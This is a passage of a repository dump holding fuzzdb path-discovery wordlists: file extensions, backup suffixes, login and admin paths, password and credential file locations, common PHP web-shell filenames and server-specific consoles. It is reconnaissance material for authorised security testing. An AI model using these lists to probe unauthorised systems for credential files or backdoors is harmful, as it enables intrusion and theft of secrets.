License.txt 32 | links.php 33 | page.php 34 | print.css 35 | readme.txt 36 | reset.css 37 | rtl.css 38 | RTL.css 39 | searchform.php 40 | search.php 41 | sidebar.php 42 | single.php 43 | style.css 44 | tag.php 45 | tags.php 46 | 47 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cms/wp_themes.readme: -------------------------------------------------------------------------------- 1 | Themes usually live in a directory called wp-content. 2 | 3 | Determine how the server handles directories which aren't present vs files which aren't present in a path that exists in order to tell which themes are installed. 4 | 5 | use wp_common_theme_files.fuzz.php inside the identified theme dirs 6 | 7 | Often you can tell the current theme by viewing source. 8 | 9 | Theme list generated last on Sept 6 2013 10 | 11 | from: http://themes.svn.wordpress.org 12 | 13 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/CommonWebExtensions.txt: -------------------------------------------------------------------------------- 1 | .asp 2 | .aspx 3 | .bat 4 | .c 5 | .cfm 6 | .cgi 7 | .com 8 | .dll 9 | .exe 10 | .htm 11 | .html 12 | .inc 13 | .jhtml 14 | .jsa 15 | .jsp 16 | .log 17 | .mdb 18 | .nsf 19 | .php 20 | .php2 21 | .php3 22 | .php4 23 | .php5 24 | .php6 25 | .php7 26 | .phtml 27 | .phps 28 | .pl 29 | .reg 30 | .sh 31 | .shtml 32 | .sql 33 | .txt 34 | .xml 35 | .swf 36 | .pcap 37 | .001 38 | .002 39 | .1 40 | .2 41 | .7z 42 | .Z 43 | .back 44 | .backup 45 | .bak 46 | .bakup 47 | .bas 48 | .bz2 49 | .c 50 | .conf 51 | .copia 52 | .core 53 | .cpp 54 | .dat 55 | .db 56 | .default 57 | .dll 58 | .doc 59 | .ini 60 | .jar 61 | .java 62 | .old 63 | .orig 64 | .pas 65 | .rar 66 | .sav 67 | .saved 68 | .source 69 | .src 70 | .stackdump 71 | .tar 72 | .tar.gz 73 | .temp 74 | .test 75 | .tgz 76 | .tmp 77 | .txt 78 | .war 79 | 
.zip 80 | ~ 81 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Backup.txt: -------------------------------------------------------------------------------- 1 | backup 2 | bck 3 | old 4 | save 5 | bak 6 | sav 7 | ~ 8 | copy 9 | old 10 | orig 11 | tmp 12 | txt 13 | back 14 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Compressed.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 000 3 | 7z 4 | a00 5 | a01 6 | a02 7 | ace 8 | ain 9 | alz 10 | apz 11 | ar 12 | arc 13 | arh 14 | ari 15 | arj 16 | ark 17 | axx 18 | b64 19 | ba 20 | bh 21 | boo 22 | bz 23 | bz2 24 | bzip 25 | bzip2 26 | c00 27 | c01 28 | c02 29 | car 30 | cb7 31 | cbr 32 | cbt 33 | cbz 34 | cp9 35 | cpgz 36 | cpt 37 | dar 38 | dd 39 | deb 40 | dgc 41 | dist 42 | ecs 43 | efw 44 | epi 45 | f 46 | fdp 47 | gca 48 | gz 49 | gzi 50 | gzip 51 | ha 52 | hbc 53 | hbc2 54 | hbe 55 | hki 56 | hki1 57 | hki2 58 | hki3 59 | hpk 60 | hyp 61 | ice 62 | ipg 63 | ipk 64 | ish 65 | j 66 | jar.pack 67 | jgz 68 | jic 69 | kgb 70 | lbr 71 | lemon 72 | lha 73 | lnx 74 | lqr 75 | lz 76 | lzh 77 | lzm 78 | lzma 79 | lzo 80 | lzx 81 | md 82 | mint 83 | mou 84 | mpkg 85 | mzp 86 | oar 87 | p7m 88 | packgz 89 | package 90 | pae 91 | pak 92 | paq6 93 | paq7 94 | paq8 95 | par 96 | par2 97 | pbi 98 | pcv 99 | pea 100 | pet 101 | pf 102 | pim 103 | pit 104 | piz 105 | pkg 106 | pup 107 | puz 108 | pwa 109 | qda 110 | r0 111 | r00 112 | r01 113 | r02 114 | r03 115 | r1 116 | r2 117 | r30 118 | rar 119 | rev 120 | rk 121 | rnc 122 | rp9 123 | rpm 124 | rte 125 | rz 126 | rzs 127 | s00 128 | s01 129 | s02 130 | s7z 131 | sar 132 | sdc 133 | sdn 134 | sea 135 | sen 136 | sfs 137 | sfx 138 | sh 139 | shar 140 | shk 141 | shr 142 | sit 143 | sitx 144 | spt 145 | sqx 
146 | sqz 147 | tar 148 | targz 149 | tarxz 150 | taz 151 | tbz 152 | tbz2 153 | tg 154 | tgz 155 | tlz 156 | tlzma 157 | txz 158 | tz 159 | uc2 160 | uha 161 | vem 162 | vsi 163 | wad 164 | war 165 | wot 166 | xef 167 | xez 168 | xmcdz 169 | xpi 170 | xx 171 | xz 172 | y 173 | yz 174 | z 175 | z01 176 | z02 177 | z03 178 | z04 179 | zap 180 | zfsendtotarget 181 | zip 182 | zipx 183 | zix 184 | zoo 185 | zpi 186 | zz 187 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Mostcommon.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | php 4 | php3 5 | php4 6 | php5 7 | txt 8 | shtm 9 | shtml 10 | phtm 11 | phtml 12 | jhtml 13 | pl 14 | jsp 15 | cfm 16 | cfml 17 | py 18 | rb 19 | cfg 20 | zip 21 | pdf 22 | gz 23 | tar 24 | tar.gz 25 | tgz 26 | doc 27 | docx 28 | xls 29 | xlsx 30 | conf 31 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/Extensions.Skipfish.txt: -------------------------------------------------------------------------------- 1 | 7z 2 | asmx 3 | asp 4 | aspx 5 | bak 6 | bat 7 | bin 8 | bz2 9 | c 10 | cc 11 | cfg 12 | cfm 13 | cgi 14 | class 15 | cnf 16 | conf 17 | config 18 | cpp 19 | cs 20 | csv 21 | dat 22 | db 23 | dll 24 | do 25 | doc 26 | dump 27 | ep 28 | err 29 | error 30 | exe 31 | gif 32 | gz 33 | htm 34 | html 35 | inc 36 | ini 37 | java 38 | jhtml 39 | jpg 40 | js 41 | jsf 42 | jsp 43 | key 44 | lib 45 | log 46 | lst 47 | manifest 48 | mdb 49 | meta 50 | msg 51 | nsf 52 | o 53 | old 54 | ora 55 | orig 56 | out 57 | part 58 | pdf 59 | php 60 | php3 61 | phtml 62 | pl 63 | pm 64 | png 65 | ppt 66 | properties 67 | py 68 | rar 69 | rss 70 | rtf 71 | save 72 | sh 73 | shtml 74 | so 75 | sql 76 | stackdump 77 | swf 78 | tar 79 | tar.bz2 80 | tar.gz 81 | temp 82 | test 83 | tgz 84 | 
tmp 85 | trace 86 | txt 87 | vb 88 | vbs 89 | ws 90 | xls 91 | xml 92 | xsl 93 | zip 94 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/copy_of.txt: -------------------------------------------------------------------------------- 1 | Copy_(1)_of_ 2 | Copy_(2)_of_ 3 | Copy%20of%20 4 | Copy_of_ 5 | Copy_ 6 | Copy%20 7 | _ 8 | %20 9 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-directories.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-extensions.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-files.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-medium-directories.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories-lowercase.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-small-directories.txt -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/test_demo.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | eval 35 | Eval 36 | EVAL 37 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/upload_variants.txt: 
-------------------------------------------------------------------------------- 1 | up 2 | upload 3 | uploads 4 | uploaded 5 | upfiles 6 | uploadfiles 7 | uploads 8 | fileupload 9 | uploadedfiles 10 | uploaded_files 11 | upload_files 12 | upload_content 13 | uploaded_content 14 | uploadcontent 15 | uploadedcontent 16 | uploadcertificates 17 | uploaddocuments 18 | upload_certificates 19 | upload_documents 20 | upload_images 21 | uploadimages 22 | uploadedimages 23 | uploaded_images 24 | uploaded_documents 25 | uploaded_certificates 26 | upload_test 27 | uploadtest 28 | uploadrequests 29 | upload_report 30 | uploadreport 31 | uploadreports 32 | upload_reports 33 | upload_requests 34 | uploadedreports 35 | uploaded_requests 36 | uploaded_reporst 37 | uploadedrequests 38 | upload_temp 39 | upload_tmp 40 | uploadtmp 41 | uploadtemp 42 | upload2 43 | upload3 44 | upload4 45 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/login-file-locations/Logins.txt: -------------------------------------------------------------------------------- 1 | /admin 2 | /Admin 3 | /admin.asp 4 | /admin.aspx 5 | /admin.cfm 6 | /admin.jsp 7 | /admin.php 8 | /Admin.php 9 | /admin.php4 10 | /admin.pl 11 | /Admin.pl 12 | /admin.py 13 | /admin.rb 14 | /administrator 15 | /Administrator 16 | /administrator.asp 17 | /administrator.aspx 18 | /administrator.cfm 19 | /administrator.jsp 20 | /administrator.php 21 | /Administrator.php 22 | /administrator.php4 23 | /administrator.pl 24 | /administrator.py 25 | /Administrator.py 26 | /administrator.rb 27 | /admnistrator.php3 28 | /cgi-bin/sqwebmail?noframes=1 29 | /default.asp 30 | /exchange/logon.asp 31 | /gs/admin 32 | /index.php?u= 33 | /login 34 | /Login 35 | /login.asp 36 | /login.aspx 37 | /login.cfm 38 | /login.php 39 | /Login.php 40 | /login.php3 41 | /login.php4 42 | /login.pl 43 | /Login.pl 44 | /login.py 45 | /login.rb 46 | /logon 47 | /Logon 48 | /logon.asp 49 | 
/logon.aspx 50 | /logon.jsp 51 | /logon.php 52 | /Logon.php 53 | /logon.php3 54 | /logon.php4 55 | /logon.pl 56 | /Logon.pl 57 | /logon.py 58 | /logon.rb 59 | /typo3/in 60 | /utilities/TreeView.asp 61 | /webeditor.php 62 | /exchange/logon.asp 63 | /names.nsf?OpenDatabase 64 | /Citrix/NFuse17/ 65 | /citrix/metaframe/default/ 66 | /Citrix/MetaFrameXP/ 67 | /phpmyadmin 68 | /InfoViewApp/logon.jsp 69 | /dana-na/auth/url_default/welcome.cgi 70 | /src/login.php 71 | 72 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/password-file-locations/Passwords.txt: -------------------------------------------------------------------------------- 1 | /secring.skr 2 | /secring.pgp 3 | /secring.bak 4 | /passwd 5 | /passwd.bak 6 | /master.passwd 7 | /pwd.db 8 | /htpasswd 9 | /htpasswd.bak 10 | /htgroup 11 | /spwd.db 12 | /htpasswd/htpasswd.bak 13 | /config.php 14 | /phpinfo.php 15 | /passlist 16 | /passlist.txt 17 | /auth_user_file 18 | /administrators.pwd 19 | /admin.mdb 20 | /connect.inc 21 | /globals.inc 22 | /vtund.conf 23 | /password.log 24 | /slapd.conf 25 | /wvdial.conf 26 | /.netrc 27 | /wand.dat 28 | /mrtg.cfg 29 | /zebra.conf 30 | /ospfd.conf 31 | /ccbill.log 32 | /users.mdb 33 | /lilo.conf 34 | /wwwboard/passwd.txt 35 | /db/main.mdb 36 | /sites.ini 37 | /wcx_ftp.ini 38 | /ws_ftp.ini 39 | /flashFXP.ini 40 | /serv-u.ini 41 | /eudora.ini 42 | /unattend.txt 43 | /passwd.txt 44 | /server.cfg 45 | /pass.dat 46 | /phpinfo.php 47 | /admin.dat 48 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/php/PHP.txt: -------------------------------------------------------------------------------- 1 | /phpinfo.php 2 | /test.php 3 | /test1.php 4 | /test2.php 5 | /_index.php 6 | /__index.php 7 | /index.php~ 8 | /index.php-bak 9 | /index-bak 10 | /index.php.bak 11 | /info.php 12 | /phpsecinfo 13 | /php.ini 14 | /php.ini~ 15 | /php 16 | /phpsecinfo 17 | 
/phpinfo 18 | /phpmyadmin/ 19 | /phpMyAdmin/ 20 | /mysqladmin/ 21 | /MySQLadmin 22 | /MySQLAdmin 23 | /login.php 24 | /logon.php 25 | /xmlrpc.php 26 | /dbadmin 27 | /PMA 28 | /application/configs/application.ini 29 | /awstats 30 | /myadmin -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/php/PHP_CommonBackdoors.txt: -------------------------------------------------------------------------------- 1 | c99.php 2 | c99shell.php 3 | r57.php 4 | r58.php 5 | dra.php 6 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/proxy-conf.txt: -------------------------------------------------------------------------------- 1 | /pac/ 2 | /proxy/ 3 | /.pac/ 4 | /managers/ 5 | /admin/ 6 | /employees/ 7 | /users/ 8 | /proxy/pac/ 9 | .pac 10 | proxy.pac 11 | /.pac/.pac 12 | /.pac/proxy.pac 13 | /proxy/.pac 14 | /proxy/proxy.pac 15 | /pac/.pac 16 | /pac/proxy.pac 17 | /managers/.pac 18 | /managers/proxy.pac 19 | /admin/.pac 20 | /admin/proxy.pac 21 | /employees/.pac 22 | /employees/proxy.pac 23 | /users/.pac 24 | /users/proxy.pac 25 | /proxy/pac/proxy.pac 26 | /proxy/pac/.pac 27 | users.pac 28 | admin.pac 29 | managers.pac 30 | employees.pac 31 | guest.pac 32 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/tftp.txt: -------------------------------------------------------------------------------- 1 | # files commonly transmitted via tftp 2 | 000000000000.cfg 3 | 000000000000-directory~.xml 4 | 323tosip1_1.bin 5 | 4601_02_readme_R2_3.txt 6 | 4601dbte1_82.bin 7 | 4602_02SWSIPreadme_R1_1.txt 8 | 4602dbte1_82.bin 9 | 4602sbte1_82.bin 10 | 4610_20_readme_R2_3.txt 11 | 4610_20_readme_SIP_R2_2.txt 12 | 4624_12_06readme_1_8_3.txt 13 | 4625_readme_2_5.txt 14 | 4690_010707.bin 15 | 4690_readme_1_7_7.txt 16 | 46xxreadme_111405.txt 17 | 46xxsettings.txt 18 | 46xxupgrade.scr 19 | 
a01d01b2_3.bin 20 | a02d01b2_3.bin 21 | a10d01b2_3.bin 22 | a20d01a2_3.bin 23 | a20d01b2_3.bin 24 | a25d01a2_5.bin 25 | b01d01b2_3.bin 26 | b02d01b2_3.bin 27 | b10d01b2_3.bin 28 | b20d01a2_3.bin 29 | b20d01b2_3.bin 30 | b25d01a2_5.bin 31 | bbla0_83.bin 32 | bootrom.ld 33 | cisco_util 34 | CP7912010301SIP050608A.sbin 35 | cvt01_2_3.bin 36 | cvt02_2_3.bin 37 | cvt02sw_2_3.bin 38 | def06r1_8_3.bin 39 | def24r1_8_3.bin 40 | dialplan.xml 41 | gkdefault.cfg 42 | infrared.txt 43 | merlin2.pcm 44 | OS79XX.TXT 45 | P003-07-5-00.bin 46 | P003-07-5-00.sbn 47 | P0S3-07-5-00.bin 48 | P0S3-07-5-00.loads 49 | P0S3-07-5-00.sb2 50 | phbook00e011010455.txt 51 | phone1.cfg 52 | release.xml 53 | RINGLIST.DAT 54 | s10d01b2_2.bin 55 | s20d01b2_2.bin 56 | SEP000F34118045.cnf 57 | SEP001562EA69E8.cnf 58 | SEPDefault.cnf 59 | SIP000F34118045.cnf 60 | SIPinsertMAChere.cnf 61 | SIPinsertMAChere.cnf 62 | sip_4602ap1_1.ebin 63 | sip_4602bt1_1.ebin 64 | sip_4602D01A.txt 65 | sip_4602D02A.txt 66 | sip.cfg 67 | SIPDefault.cnf 68 | sip.ld 69 | sipto323_1_1.ebin 70 | sip.ver 71 | SoundPointIPLocalization 72 | SoundPointIPWelcome.wav 73 | syncinfo.xml 74 | test 75 | test.txt 76 | uip200_463enc.pac 77 | uniden00e011030397.txt 78 | unidencom.txt 79 | XMLDefault.cnf.xml 80 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/AdobeXML.txt: -------------------------------------------------------------------------------- 1 | /flex2gateway/ 2 | /flex2gateway/http 3 | /flex2gateway/httpsecure 4 | /flex2gateway/cfamfpoolling 5 | /flex2gateway/amf 6 | /flex2gateway/amfpolling 7 | /messagebroker/http 8 | /messagebroker/httpsecure 9 | /blazeds/messagebroker/http 10 | /blazeds/messagebroker/httpsecure 11 | /samples/messagebroker/http 12 | /samples/messagebroker/httpsecure 13 | /lcds/messagebroker/http 14 | /lcds/messagebroker/httpsecure 15 | /lcds-samples/messagebroker/http 16 | /lcds-samples/messagebroker/httpsecure 17 | 
-------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Apache.txt: -------------------------------------------------------------------------------- 1 | /.htaccess 2 | /.htaccess.bak 3 | /.htpasswd 4 | /.meta 5 | /.web 6 | /apache/logs/access.log 7 | /apache/logs/access_log 8 | /apache/logs/error.log 9 | /apache/logs/error_log 10 | /httpd/logs/access.log 11 | /httpd/logs/access_log 12 | /httpd/logs/error.log 13 | /httpd/logs/error_log 14 | /logs/access.log 15 | /logs/access.log 16 | /logs/error.log 17 | /logs/error_log 18 | /access_log 19 | /cgi 20 | /cgi-bin 21 | /cgi-pub 22 | /cgi-script 23 | /dummy 24 | /error 25 | /error_log 26 | /htdocs 27 | /httpd 28 | /httpd.pid 29 | /icons 30 | /index.html 31 | /logs 32 | /manual 33 | /phf 34 | /printenv 35 | /server-info 36 | /server-status 37 | /status 38 | /test-cgi 39 | /tmp 40 | /~bin 41 | /~ftp 42 | /~nobody 43 | /~root 44 | /~toor 45 | /~daemon 46 | /~adm 47 | /~lp 48 | /~sync 49 | /~shutdown 50 | /~halt 51 | /~mail 52 | /~pop 53 | /~postmaster 54 | /~news 55 | /~uucp 56 | /~operator 57 | /~games 58 | /~gopher 59 | /~nscd 60 | /~mailnull 61 | /~ident 62 | /~rpc 63 | /~rpcuser 64 | /~xfs 65 | /~gdm 66 | /~apache 67 | /~http 68 | /~web 69 | /~www 70 | /~adm 71 | /~admin 72 | /~administrator 73 | /~guest 74 | /~firewall 75 | /~fwuser 76 | /~fwadmin 77 | /~fw 78 | /~test 79 | /~testuser 80 | /~user 81 | /~user1 82 | /~user2 83 | /~user3 84 | /~user4 85 | /~user5 86 | /~sql 87 | /~data 88 | /~database 89 | /~db 90 | /~anonymous 91 | /~staff 92 | /~office 93 | /~help 94 | /~helpdesk 95 | /~reception 96 | /~system 97 | /~operator 98 | /~backup 99 | /~vagrant 100 | /~guest 101 | /~mysql 102 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/ApacheTomcat.txt: -------------------------------------------------------------------------------- 1 | 
/examples 2 | /examples/jsp/index.html 3 | /examples/jsp/snp/snoop.jsp 4 | /examples/jsp/source.jsp 5 | /examples/servlet/HelloWorldExample 6 | /examples/servlet/SnoopServlet 7 | /examples/servlet/TroubleShooter 8 | /examples/servlet/default/jsp/snp/snoop.jsp 9 | /examples/servlet/default/jsp/source.jsp 10 | /examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 11 | /examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 12 | /examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 13 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 14 | /examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 15 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 16 | /examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 17 | /examples/servlet/snoop 18 | /examples/servlets/index.html 19 | /jsp-examples 20 | /manager 21 | /manager/deploy?path=foo 22 | /manager/html/ 23 | /servlet/default/ 24 | /servlet/mstrWebAdmin 25 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 26 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 27 | /servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 28 | /servlet/org.apache.catalina.servlets.DefaultServlet/ 29 | /servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 30 | /servlet/org.apache.catalina.servlets.HTMLManagerServlet 31 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 32 | /servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 33 | /servlet/org.apache.catalina.servlets.ManagerServlet 34 | /servlet/org.apache.catalina.servlets.SnoopAllServlet 35 | /servlet/org.apache.catalina.servlets.WebdavServlet/ 36 | /tomcat-docs 37 | /webdav 38 | /webdav/index.html 39 | 
/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 40 | /webdav/servlet/webdav/ 41 | /conf/ 42 | /conf/server.xml/ 43 | /WEB-INF/ 44 | /WEB-INF/web.xml 45 | /WEB-INF/classes/ 46 | /shared/ 47 | /shared/lib/ 48 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Apache_Axis.txt: -------------------------------------------------------------------------------- 1 | AdminServlet 2 | AxisServlet 3 | EchoHeaders.jws 4 | SOAPMonitor 5 | StockQuoteService.jws 6 | fingerprint.jsp 7 | happyaxis.jsp 8 | i18nLib.jsp 9 | index.html 10 | index.jsp 11 | index.jws 12 | services 13 | services/ 14 | servlet 15 | servlet/AdminServlet 16 | servlet/AxisServlet 17 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Frontpage.txt: -------------------------------------------------------------------------------- 1 | /admin.dll 2 | /admin.exe 3 | /administrators.pwd 4 | /author.dll 5 | /author.exe 6 | /author.log 7 | /authors.pwd 8 | /cgi-bin 9 | /default.htm 10 | /_fpclass 11 | /frontpg.ini 12 | /.htaccess 13 | /iisadmin 14 | /isadmin 15 | /logo.gif 16 | /_private 17 | /queryhit.htm 18 | /QUERYHIT.HTM 19 | /samples 20 | /search 21 | /Search 22 | /service.grp 23 | /service.pwd 24 | /shtml.exe 25 | /srchadm 26 | /users.pwd 27 | /_vti_adm 28 | /_vti_aut 29 | /_vti_bin 30 | /_vti_cnf 31 | /_vti_inf.html 32 | /vti_inf.html 33 | /_vti_log 34 | /_vti_pvt 35 | /_vti_txt 36 | /_vti_bin/_vti_aut/author.dll 37 | /_vti_bin/shtml.exe?_vti_rp 38 | 39 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/HTTP_POST_Microsoft.txt: -------------------------------------------------------------------------------- 1 | # Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb 2 | 
/msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName 3 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/JBoss.txt: -------------------------------------------------------------------------------- 1 | /jmx-console 2 | /web-console 3 | /web-console/Invoker 4 | /invoker/JMXInvokerServlet 5 | /WEB-INF/jboss-web.xml 6 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/JRun.txt: -------------------------------------------------------------------------------- 1 | /compass/logon.jsp 2 | /databasenotes.html 3 | /flash/java/javabean/FlashJavaBean.html 4 | /jrunscripts 5 | /jstl-war/index.html 6 | /SmarTicketApp/index.html 7 | /techniques/servlets/index.html 8 | /travelnet/home.jsp 9 | /WEB-INF/webapp.properties 10 | /WEB-INF/web.xml 11 | /worldmusic/action/catalog 12 | /worldmusic/action/cdlist 13 | /ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/JavaServlets_Common.txt: -------------------------------------------------------------------------------- 1 | /DWREasyAjax/dwr/index.html 2 | /dwr/index.html 3 | /dwr/engine.js 4 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Netware.txt: -------------------------------------------------------------------------------- 1 | /ICHAINErrors 2 | /ICSLogin 3 | /ICHAINLogout 4 | /ICSIBroker 5 | /NetStorage 6 | /iManager 7 | /eMFrame 8 | /oneNet 9 | /ICHAIN 10 | /ICS 11 | /NSearch 12 | /SearchServlet 13 | /site 14 | /home.html 15 | /iFolder 16 | /update 17 | /webacc 18 | /nps 19 | -------------------------------------------------------------------------------- 
/fuzzdb/discovery/predictable-filepaths/webservers-appservers/Oracle9i.txt: -------------------------------------------------------------------------------- 1 | /CookieExample 2 | /Counter 3 | /DateServlet 4 | /HelloWorldServlet 5 | /RequestParamExample 6 | /SessionExample 7 | /SessionServlet 8 | /SimpleServlet 9 | /SnoopServlet 10 | /basic 11 | /cal 12 | /cgi-bin 13 | /echo 14 | /examples 15 | /fcgi-bin 16 | /hellouser 17 | /hellouser.jsp 18 | /j2ee 19 | /jsp 20 | /login.html 21 | /ojspdemos 22 | /perl 23 | /printenv 24 | /servlet 25 | /simple 26 | /snoop.jsp 27 | /snp 28 | /usebean.jsp 29 | /welcomeuser.jsp 30 | /pls 31 | /SIMPLEDAD 32 | /HTMLDB 33 | /ORASSO 34 | /SSODAD 35 | /PORTAL 36 | /PORTAL2 37 | /PORTAL30 38 | /PORTAL30_SSO 39 | /TEST 40 | /DAD 41 | /APP 42 | /ONLINE 43 | /DB 44 | /OWA 45 | /simpledad 46 | /htmldb 47 | /orasso 48 | /ssodad 49 | /portal 50 | /portal2 51 | /portal30 52 | /portal30_sso 53 | /test 54 | /dad 55 | /app 56 | /online 57 | /db 58 | /owa 59 | /null 60 | /pls/dad/null 61 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/README.md: -------------------------------------------------------------------------------- 1 | 2 | Notes: 3 | 4 | ADFS.fuzz.txt 5 | Microsoft ADFS is usually installed on a web server under the default HTTP root path /adfs/ls, but this is not mandatory. 
